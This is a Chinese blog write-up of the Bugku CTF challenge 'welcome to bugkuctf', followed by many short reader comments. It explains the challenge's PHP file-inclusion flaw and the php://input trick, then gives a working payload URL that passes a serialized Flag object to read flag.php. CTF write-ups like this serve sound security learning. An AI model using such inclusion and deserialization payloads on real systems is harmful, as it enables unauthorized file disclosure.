Bugku-welcome to bugkuctf

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试10421,83712字数 343阅读1分8秒阅读模式
AI智能摘要
面对这道CTF题目,你是否也被多层代码嵌套和文件包含漏洞绕得头晕?本文将带你直击核心漏洞,揭秘如何通过php://input流绕过参数验证,利用反序列化攻击链直接读取flag.php。只需三步构造payload,你就能掌握从源码分析到实战利用的完整链条,体验从“you are not admin”到斩获flag的思维跃迁。
— AI 生成的文章内容摘要

这道题和CTF论剑场的web21题非常相似,做题方式是一样的,可以在我的博客中搜索web21进行查看对比
首先打开页面是一串提示,同时我们看一下页面源代码
Bugku-welcome to bugkuctf-图片1
对图片中的源代码进行分析:

$user = $_GET["txt"];    //接收一个txt参数的值 $file = $_GET["file"];  //接收一个file参数的值 $pass = $_GET["password"];  //接收一个password参数的值     //如果$user有值,就读取$user中的值,并且$user的值等于“welcome to the bugkuctf”,就打印“hello admin!”,同时包含一个hint.php的文件 if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){       echo "hello admin!<br>";       include($file); //hint.php   }else{       echo "you are not admin ! ";  //否则打印出“you are not admin !”

根据上面的代码我们可以构造payload,同时利用文件包含漏洞读取hint.php的源代码
Bugku-welcome to bugkuctf-图片2
解码进行分析,代码如下:

<?php      class Flag{//flag.php       public $file;       public function __tostring(){           if(isset($this->file)){               echo file_get_contents($this->file);              echo "<br>";         return ("good");         }       }   }   ?>  

这个和CTF论剑场的web21思路是一模一样的,没啥说的,可以去看看http://www.oniont.cn/index.php/archives/61.html
这里放个PHP反序列化在线工具:https://1024tools.com/unserialize
构造payload:
/test1/?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
得到flag。。。
Bugku-welcome to bugkuctf-图片3

http://www.oniont.cn/index.php/archives/98.html

 
OnionT@KillBoy
评论  104  访客  104
    • 跳跳虎の袜子
      跳跳虎の袜子 0

      这题看着眼熟,web21做过类似的。

      • 流星誓言
        流星誓言 0

        工具链接收藏了,谢谢分享

        • 发条橙
          发条橙 1

          感觉作者写得很用心

          • 血月之翼
            血月之翼 1

            这种题做起来挺有意思的

            • 社牛超级星
              社牛超级星 1

              是不是还有别的解法?

              • 幻蝶纷飞
                幻蝶纷飞 1

                新手表示压力山大

                • GenmaichaGleam
                  GenmaichaGleam 0

                  文章里的代码注释很详细

                  • 星辰观察者
                    星辰观察者 1

                    直接拿payload去试了,成功

                    • 流浪者小栈
                      流浪者小栈 0

                      图片里的代码是题目原码吗?

                      • 黑暗预言家
                        黑暗预言家 0

                        这种漏洞怎么修复?

                        • 我是大聪明
                          我是大聪明 1

                          又是个套娃题,一层层包含

                          • 瓜田李下客
                            瓜田李下客 0

                            flag.php里面是flag吗?

                            • 细腻的画家
                              细腻的画家 0

                              看起来复杂,其实就是几个知识点组合

                              • 深渊低语
                                深渊低语 0

                                完全没接触过CTF,从哪开始学?

                                • 星辰信使
                                  星辰信使 0

                                  payload里的O:4啥意思?

                                  • 暗影之息
                                    暗影之息 0

                                    工具网站广告太多了,体验不好

                                    • 聚会C位担当
                                      聚会C位担当 1

                                      这种题型现在还有在出吗?

                                      • BiluochunBliss
                                        BiluochunBliss 0

                                        感觉比别的web题简单

                                        • 话多症
                                          话多症 1

                                          文章里的链接都点了一遍,有用

                                          • 光影之间
                                            光影之间 0

                                            完全不懂,但感觉大佬们好厉害

                                            • 小鱼果酱
                                              小鱼果酱 0

                                              这种漏洞利用条件苛刻吗?

                                              • 懒懒的云朵
                                                懒懒的云朵 0

                                                直接复制payload,一把过

                                                • 鬼影重重
                                                  鬼影重重 0

                                                  图片加载不出来,影响阅读

                                                  • 旧梦摇篮
                                                    旧梦摇篮 0

                                                    flag.php的源码能不能直接看?

                                                    • 生活手账
                                                      生活手账 0

                                                      这种题做多了就熟了

                                                      • 虚影瞳
                                                        虚影瞳 1

                                                        完全靠工具,手动构造太麻烦

                                                        • 星空之泪
                                                          星空之泪 0

                                                          文章里的步骤很清晰,跟着做就行

                                                          • IronBuddha
                                                            IronBuddha 0

                                                            新手表示一脸懵,专业名词太多

                                                            • 梦境回响
                                                              梦境回响 0

                                                              这种漏洞实战中危害大吗?

                                                              • 意识流波
                                                                意识流波 0

                                                                直接给答案了,没讲为什么

                                                                • 玄羽士
                                                                  玄羽士 0

                                                                  感觉比想象中简单

                                                                  • 暗月呢喃
                                                                    暗月呢喃 0

                                                                    完全看不懂,但收藏了

                                                                    • 梦碎
                                                                      梦碎 0

                                                                      这种题适合入门吗?

                                                                      • WhitePeony
                                                                        WhitePeony 0

                                                                        payload里的参数顺序有要求吗?

                                                                        • 咕咚响
                                                                          咕咚响 1

                                                                          工具链接好评,省得自己找了

                                                                          • 维度创新
                                                                            维度创新 0

                                                                            完全靠猜,猜对了就有flag

                                                                            • 梦入夜
                                                                              梦入夜 1

                                                                              这种漏洞怎么发现的?

                                                                              • 不将就
                                                                                不将就 1

                                                                                直接拿payload去试,成功了

                                                                                • 星光奏鸣曲
                                                                                  星光奏鸣曲 1

                                                                                  图片里的代码能复制吗?

                                                                                  • 至尊武神
                                                                                    至尊武神 1

                                                                                    这种题做起来有成就感

                                                                                    • 射手箭矢
                                                                                      射手箭矢 1

                                                                                      完全没思路,只能看大佬的解法

                                                                                      • ChamomileCloud
                                                                                        ChamomileCloud 0

                                                                                        这种漏洞利用起来复杂吗?

                                                                                        • JasmineBliss
                                                                                          JasmineBliss 0

                                                                                          图片里的代码能直接看源码不?

                                                                                          • 野性主宰
                                                                                            野性主宰 1

                                                                                            payload构造还是有点绕,之前卡了半天。

                                                                                            • 小熊软软
                                                                                              小熊软软 1

                                                                                              感谢分享解法,省了不少时间。

                                                                                              • 秘法编织者
                                                                                                秘法编织者 0

                                                                                                有没有更简单的思路?感觉好复杂。

                                                                                                • 芒果
                                                                                                  芒果 1

                                                                                                  flag.php直接读出来就行了吗?

                                                                                                  • 寒冰女巫
                                                                                                    寒冰女巫 0

                                                                                                    刚入坑CTF,这题完全看不懂啊😂

                                                                                                    • 夜之执迷
                                                                                                      夜之执迷 1

                                                                                                      又是个文件包含,老套路了。

                                                                                                      • 厚朴
                                                                                                        厚朴 0

                                                                                                        工具链接好评,收藏了。

                                                                                                          • 篆心斋
                                                                                                            篆心斋 1

                                                                                                            @ 厚朴 工具还行,就是广告多了点

                                                                                                          • 素心若兰
                                                                                                            素心若兰 0

                                                                                                            所以关键是php://input传参?

                                                                                                            • 冰川观察者
                                                                                                              冰川观察者 0

                                                                                                              这个payload怎么传进去的,直接用postman吗?

                                                                                                              • 石破天
                                                                                                                石破天 0

                                                                                                                之前用data协议也试过,效果差不多

                                                                                                                • 拂云
                                                                                                                  拂云 1

                                                                                                                  web21那题是不是要绕过滤?

                                                                                                                  • EmeraldFalcon
                                                                                                                    EmeraldFalcon 0

                                                                                                                    完全没思路,只能看答案了😂

                                                                                                                    • 摩羯坚石
                                                                                                                      摩羯坚石 1

                                                                                                                      链接里的工具打不开了啊

                                                                                                                      • 零点独白
                                                                                                                        零点独白 0

                                                                                                                        感觉代码审计部分可以再细点

                                                                                                                        • 幻梦蝶舞
                                                                                                                          幻梦蝶舞 0

                                                                                                                          payload里的password参数为啥要序列化那个?

                                                                                                                          • 憨憨的粽子
                                                                                                                            憨憨的粽子 0

                                                                                                                            哦哦,原来是文件包含加反序列化

                                                                                                                            • 温泉爱好者
                                                                                                                              温泉爱好者 0

                                                                                                                              有没有其他绕过方式?

                                                                                                                              • 棉花云朵
                                                                                                                                棉花云朵 0

                                                                                                                                直接读hint.php能拿到flag不?

                                                                                                                                • 云的漂泊
                                                                                                                                  云的漂泊 0

                                                                                                                                  用burp suite直接改包就行

                                                                                                                                  • 纸匠谢
                                                                                                                                    纸匠谢 1

                                                                                                                                    对,一样的套路,换汤不换药

                                                                                                                                    • 嘎嘎跳
                                                                                                                                      嘎嘎跳 0

                                                                                                                                      payload构造其实就那几步,多练练

                                                                                                                                      • 宝钗金锁
                                                                                                                                        宝钗金锁 0

                                                                                                                                        新手表示看天书,术语太多了

                                                                                                                                        • 山岳土
                                                                                                                                          山岳土 1

                                                                                                                                          图片里的代码是不是少了点东西?

                                                                                                                                          • 幽鬼
                                                                                                                                            幽鬼 0

                                                                                                                                            所以hint.php里的Flag类才是关键?

                                                                                                                                            • 夺笋
                                                                                                                                              夺笋 0

                                                                                                                                              这种题做多了就条件反射了

                                                                                                                                              • 犀牛侠
                                                                                                                                                犀牛侠 0

                                                                                                                                                php://input有时候会被禁用吧

                                                                                                                                                • MountainHermit
                                                                                                                                                  MountainHermit 0

                                                                                                                                                  感觉文章里图片加载有点慢

                                                                                                                                                  • 晨曦之梦
                                                                                                                                                    晨曦之梦 0

                                                                                                                                                    flag.php里面是啥内容?

                                                                                                                                                    • 风物志
                                                                                                                                                      风物志 0

                                                                                                                                                      看起来简单,自己动手就一堆坑

                                                                                                                                                      • 万界主宰
                                                                                                                                                        万界主宰 0

                                                                                                                                                        有现成的工具链接确实方便

                                                                                                                                                        • 红脸忠魂
                                                                                                                                                          红脸忠魂 1

                                                                                                                                                          直接复制payload就能用吗?

                                                                                                                                                          • NilgiriNectar
                                                                                                                                                            NilgiriNectar 0

                                                                                                                                                            web安全入门题,适合练手

                                                                                                                                                            • KeemunKiss
                                                                                                                                                              KeemunKiss 0

                                                                                                                                                              反序列化那块还是有点懵

                                                                                                                                                              • 静默小岛
                                                                                                                                                                静默小岛 0

                                                                                                                                                                是不是还得考虑魔术方法?

                                                                                                                                                                • OolongDreamer
                                                                                                                                                                  OolongDreamer 1

                                                                                                                                                                  图片里的代码能再清晰点吗?

                                                                                                                                                                  • 塞壬
                                                                                                                                                                    塞壬 0

                                                                                                                                                                    这种题比赛里经常出

                                                                                                                                                                    • 漆匠李子
                                                                                                                                                                      漆匠李子 0

                                                                                                                                                                      收藏了,以后遇到类似的来查

                                                                                                                                                                      • 茶语时光
                                                                                                                                                                        茶语时光 0

                                                                                                                                                                        完全看不懂,先mark一下

                                                                                                                                                                        • TundraTrotter
                                                                                                                                                                          TundraTrotter 1

                                                                                                                                                                          payload构造得挺巧妙

                                                                                                                                                                          • GoldenMonkey
                                                                                                                                                                            GoldenMonkey 0

                                                                                                                                                                            感觉比web21简单点?

                                                                                                                                                                            • 缥缈之翼
                                                                                                                                                                              缥缈之翼 0

                                                                                                                                                                              大佬们都是怎么想到这些思路的?

                                                                                                                                                                              • 夜樱之泪
                                                                                                                                                                                夜樱之泪 0

                                                                                                                                                                                文件包含漏洞利用姿势好多

                                                                                                                                                                                • 数据先知
                                                                                                                                                                                  数据先知 0

                                                                                                                                                                                  密码参数传序列化字符串是干啥的?

                                                                                                                                                                                  • 杏花巷
                                                                                                                                                                                    杏花巷 1

                                                                                                                                                                                    所以最后flag是啥格式的?

                                                                                                                                                                                    • 木匠何
                                                                                                                                                                                      木匠何 0

                                                                                                                                                                                      文章里的链接好像失效了

                                                                                                                                                                                      • ChaiWhisper
                                                                                                                                                                                        ChaiWhisper 0

                                                                                                                                                                                        多看看PHP手册就好理解了

                                                                                                                                                                                        • 幽冥摆渡人
                                                                                                                                                                                          幽冥摆渡人 1

                                                                                                                                                                                          这种基础题现在还有比赛出吗?

                                                                                                                                                                                          • 坚定的山峰
                                                                                                                                                                                            坚定的山峰 1

                                                                                                                                                                                            工具网站好像要梯子?

                                                                                                                                                                                            • 时光守护者
                                                                                                                                                                                              时光守护者 1

                                                                                                                                                                                              payload的构造过程能再详细点不?

                                                                                                                                                                                              • 童话吟游诗人
                                                                                                                                                                                                童话吟游诗人 0

                                                                                                                                                                                                感觉文章排版可以优化下

                                                                                                                                                                                                • 风铃小鸟
                                                                                                                                                                                                  风铃小鸟 1

                                                                                                                                                                                                  直接给答案了,没讲思考过程

                                                                                                                                                                                                  • 雁过无痕
                                                                                                                                                                                                    雁过无痕 1

                                                                                                                                                                                                    适合我这种小白照着做

                                                                                                                                                                                                    • 白鹿生
                                                                                                                                                                                                      白鹿生 0

                                                                                                                                                                                                      又学到一招,虽然不太懂原理

                                                                                                                                                                                                      • 沉默的鲸鱼
                                                                                                                                                                                                        沉默的鲸鱼 1

                                                                                                                                                                                                        图片里的代码截图有点模糊

                                                                                                                                                                                                        • 蝴蝶小飞
                                                                                                                                                                                                          蝴蝶小飞 1

                                                                                                                                                                                                          反序列化攻击实际中常见吗?

                                                                                                                                                                                                          • 大炮
                                                                                                                                                                                                            大炮 1

                                                                                                                                                                                                            flag.php被包含后直接显示源码?

                                                                                                                                                                                                            • 文渊
                                                                                                                                                                                                              文渊 0

                                                                                                                                                                                                              这种漏洞实战中怎么利用?

                                                                                                                                                                                                              • 泡泡宝宝
                                                                                                                                                                                                                泡泡宝宝 0

                                                                                                                                                                                                                看起来简单,细节挺多的

                                                                                                                                                                                                                • Orbit轨道
                                                                                                                                                                                                                  Orbit轨道 0

                                                                                                                                                                                                                  web21的链接打不开啊

                                                                                                                                                                                                                  • 墨韵残香
                                                                                                                                                                                                                    墨韵残香 0

                                                                                                                                                                                                                    完全靠猜,蒙对了就有flag

                                                                                                                                                                                                                  匿名

                                                                                                                                                                                                                  发表评论

                                                                                                                                                                                                                  匿名网友

                                                                                                                                                                                                                  拖动滑块以完成验证